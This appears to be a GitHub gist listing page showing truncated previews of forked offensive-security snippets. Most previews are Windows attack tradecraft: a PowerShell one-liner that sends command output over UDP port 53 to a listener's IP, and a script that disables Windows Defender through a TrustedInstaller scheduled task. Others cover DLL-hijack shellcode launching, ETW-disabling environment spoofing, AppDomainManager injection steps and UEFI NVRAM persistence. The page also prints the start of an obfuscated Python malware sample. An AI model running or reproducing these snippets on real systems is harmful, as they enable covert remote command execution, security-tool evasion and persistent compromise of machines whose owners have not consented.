Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
boh
/ privileged.py
Created
August 12, 2020 02:06
— forked from wdormann/privileged.py
List privileged services that don't come with Windows 10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import subprocess | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| FNULL = open(os.devnull, 'w') | |
| win10builtin = ['AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
| 'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
| 'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', |
boh
/ _README.md
Created
August 5, 2020 05:15
— forked from jthuraisamy/_README.md
GospelRoom: Data Storage in UEFI NVRAM Variables
boh
/ powershell-udp-rce-output.txt
Created
July 13, 2020 04:20
— forked from ignis-sec/powershell-udp-rce-output.txt
powershell command to return executed command output from 53/udp.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # On your host: | |
| # $ nc -lnvup 53 | |
| # Replace <HOSTIP> with ip of the listening machine | |
| powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" | |
boh
/ DllMainThread.c
Created
July 3, 2020 04:29
— forked from securitytube/DllMainThread.c
Launch Shellcode as a Thread via DllMain rather than a new process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Dll Hijacking via Thread Creation | |
| // Author - Vivek Ramachandran | |
| // Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
| // Free Infosec Videos -- http://SecurityTube.net | |
| #include <windows.h> | |
| #define SHELLCODELEN 2048 |
boh
/ env_var_spoofing_poc.cpp
Created
June 7, 2020 08:35
— forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
boh
/ _Instructions_Reproduce.md
Created
April 30, 2020 03:18
GhostLoader - AppDomainManager - Injection - 攻壳机动队
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
boh
/ Get-ProcessTree.ps1
Created
March 23, 2020 04:01
— forked from JPMinty/Get-ProcessTree.ps1
PowerShell 2.0 script to get processes tree
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modified to include support for CommandLine, File Hashes, File Paths, Signing Certificates | |
| # Copyright (c) 2020 Jai Minton. All rights reserved. | |
| # Copyright (c) 2014 Atif Aziz. All rights reserved. | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 | |
| # |
boh
/ clr_via_native.c
Created
March 22, 2020 09:37
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
boh
/ b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
Created
March 17, 2020 09:00
— forked from JohnLaTwC/b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
python malware b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937 | |
| import zlib, base64 | |
| exec(zlib.decompress(base64.b64decode('eJzs3fuT5Xd95/ff9Vd0DbU1UiyL7j6X7iOXqsJabIWyYQksu9nYW67RTCN6PepRpmfAxOUqgQChlQyDkHUBLGZ0GdBldAex3PxvOLB2ycUGY2Crz5+QM7qgsCZU8kPmPM/3PFKpxOYihO3Ha8S3P+957t9x55mz5zbO7v1v5/cOzx3eeG7/jr0bD8/fdufZMyf3Dg9vPPzk4Y1nDq+bX7j4yPzC00/On/jB38yfeuGl+YXLl+YPf+fe+YXn7ppfePn5+Te/8NT80uUH/+7F+WNPfGZ+8bUvzC+8+JX5c9/5xvzil7/8kwsPzy+9dt/Ra3fPH//ep+fPv/CZ+YVn7p5f+Oar8wuffvkn3/ra/MKlL/34hcUf7NH5Y9+9d/70F5/5P7/17NErX51fePChf3r2nvljT352/vhX/2r+yN3f/y8X50994+vzC99/8OjKd35+9wvziw/eO3/2ycvzbz68+PsfeWrxj33i75+YP3fPQ/NHvvbln7/y1b99cf7wQ5+fP3bptfmVR742v3jp7qPvvji//K3X/ttnfjB/5K5L8yce/Zv/8o0fPT2/cOW++WPfuf/ohR/Mn/z0Dxf/Dr/+o2/Pn/zB1+ZPPffD+dPPvfr6M/f84oc/mF948pXFn/0Di3+de+dX/vLBX9z19Pzi5a/84q5v/OyRR39+92fmD3/v8uLvu7T4Q31r/sRn7/vpF58/euWef3rupb/77vyxp+7+0Vfml569e/7Y49/7r5975Oj5h+YX/vqv/u7Rn33nO0evXpk/ffnC/MIrX58/98A98yf+6sr8m99+7Kffvfz3n/pv9z4yf/Lxexf/rJfmT375Uz978cn5Ny4/sPif8 |